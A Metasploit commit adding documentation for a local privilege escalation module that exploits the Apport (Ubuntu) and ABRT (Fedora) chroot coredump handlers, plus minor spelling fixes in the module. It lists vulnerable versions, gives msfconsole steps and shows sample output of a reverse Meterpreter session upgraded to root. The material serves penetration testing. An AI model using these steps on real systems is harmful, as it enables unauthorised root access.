Add documentation

bcoles · bcoles · commit 23f4bf1583c6 · 2018-01-27T03:15:06.000Z
diff --git a/documentation/modules/exploit/linux/local/apport_abrt_chroot_priv_esc.rb b/documentation/modules/exploit/linux/local/apport_abrt_chroot_priv_esc.rb
@@ -0,0 +1,69 @@
+## Description
+
+  This module attempts to gain root privileges on Ubuntu and Fedora systems by invoking the default coredump handler inside a namespace ("container").
+
+
+## Vulnerable Application
+
+  Apport versions 2.13 through 2.17.x before 2.17.1 on Ubuntu are vulnerable, due to a feature which allows forwarding reports to a container's Apport by changing the root directory before loading the crash report, causing `usr/share/apport/apport` within the crashed task's directory to be executed.
+
+  Similarly, Fedora is vulnerable when the kernel crash handler is configured to change root directory before executing ABRT, causing `usr/libexec/abrt-hook-ccpp` within the crashed task's directory to be executed.
+
+  In both instances, the crash handler does not drop privileges, resulting in code execution as root.
+
+  * Apport 2.14.1 on Ubuntu 14.04.1 LTS x86 and x86_64
+  * ABRT on Fedora 19 and 20 x86_64.
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get a session
+  3. Do: `use exploit/linux/local/apport_abrt_chroot_priv_esc`
+  4. Do: `set SESSION [SESSION]`
+  5. Do: `check`
+  6. Do: `run`
+  7. You should get a new root session
+
+
+## Options
+
+  **SESSION**
+
+  Which session to use, which can be viewed with `sessions`
+
+  **WritableDir**
+
+  A writable directory file system path. (default: `/tmp`)
+
+
+## Scenarios
+
+  ```
+  msf > use exploit/linux/local/apport_abrt_chroot_priv_esc
+  msf exploit(linux/local/apport_abrt_chroot_priv_esc) > set session 1
+  session => 1
+  msf exploit(linux/local/apport_abrt_chroot_priv_esc) > run
+
+  [!] SESSION may not be compatible with this module.
+  [*] Started reverse TCP handler on 172.16.191.244:4444 
+  [*] Writing '/tmp/.drY6cJZ' (887316 bytes) ...
+  [*] Writing '/tmp/.LtJvrgjXq' (207 bytes) ...
+  [*] Launching exploit...
+  [+] Upgraded session to root privileges ('uid=0(root) gid=1000(user) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare),1000(user)')
+  [*] Sending stage (857352 bytes) to 172.16.191.252
+  [*] Meterpreter session 2 opened (172.16.191.244:4444 -> 172.16.191.252:35552) at 2018-01-11 09:58:25 -0500
+  [+] Deleted /tmp/.drY6cJZ
+  [+] Deleted /tmp/.LtJvrgjXq
+
+  meterpreter > getuid
+  Server username: uid=0, gid=1000, euid=0, egid=1000
+  meterpreter > sysinfo
+  Computer     : 172.16.191.252
+  OS           : Ubuntu 14.04 (Linux 3.13.0-32-generic)
+  Architecture : x64
+  BuildTuple   : i486-linux-musl
+  Meterpreter  : x86/linux
+  meterpreter > 
+  ```
+
diff --git a/modules/exploits/linux/local/apport_abrt_chroot_priv_esc.rb b/modules/exploits/linux/local/apport_abrt_chroot_priv_esc.rb
@@ -12,7 +12,7 @@ class MetasploitModule < Msf::Exploit::Local
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Apport / Abrt chroot Privilege Escalation',
+      'Name'           => 'Apport / ABRT chroot Privilege Escalation',
       'Description'    => %q{
         This module attempts to gain root privileges on Linux systems by
         invoking the default coredump handler inside a namespace ("container").
@@ -24,15 +24,15 @@ def initialize(info = {})
         task's directory to be executed.
 
         Similarly, Fedora is vulnerable when the kernel crash handler is
-        configured to change root directory before executing Abrt, causing
+        configured to change root directory before executing ABRT, causing
         'usr/libexec/abrt-hook-ccpp' within the crashed task's directory to be
         executed.
 
         In both instances, the crash handler does not drop privileges,
         resulting in code execution as root.
 
         This module has been tested successfully on Apport 2.14.1 on
-        Ubuntu 14.04.1 LTS x86 and x86_64 and Abrt on Fedora 19 and 20 x86_64.
+        Ubuntu 14.04.1 LTS x86 and x86_64 and ABRT on Fedora 19 and 20 x86_64.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -55,7 +55,7 @@ def initialize(info = {})
           [ 'EDB', '36782' ],
           [ 'EDB', '36746' ],
           [ 'URL', 'https://gist.github.com/taviso/0f02c255c13c5c113406' ],
-          # Abrt (Fedora)
+          # ABRT (Fedora)
           [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1211223' ],
           [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1211835' ],
           # Apport (Ubuntu)
@@ -92,7 +92,7 @@ def check
     # Patched systems no longer preface the command with /usr/sbin/chroot
     #   kernel.core_pattern = |/usr/libexec/abrt-hook-ccpp %s %c %p %u %g %t e
     if kernel_core_pattern.include?('chroot') && kernel_core_pattern.include?('abrt-hook-ccpp')
-      vprint_good 'System is configured to chroot Abrt for crash reporting'
+      vprint_good 'System is configured to chroot ABRT for crash reporting'
       return CheckCode::Vulnerable
     end
 
@@ -120,7 +120,7 @@ def check
       return CheckCode::Safe
     end
 
-    vprint_error 'System is NOT configured to use Apport or chroot Abrt for crash reporting'
+    vprint_error 'System is NOT configured to use Apport or chroot ABRT for crash reporting'
 
     CheckCode::Safe
   end
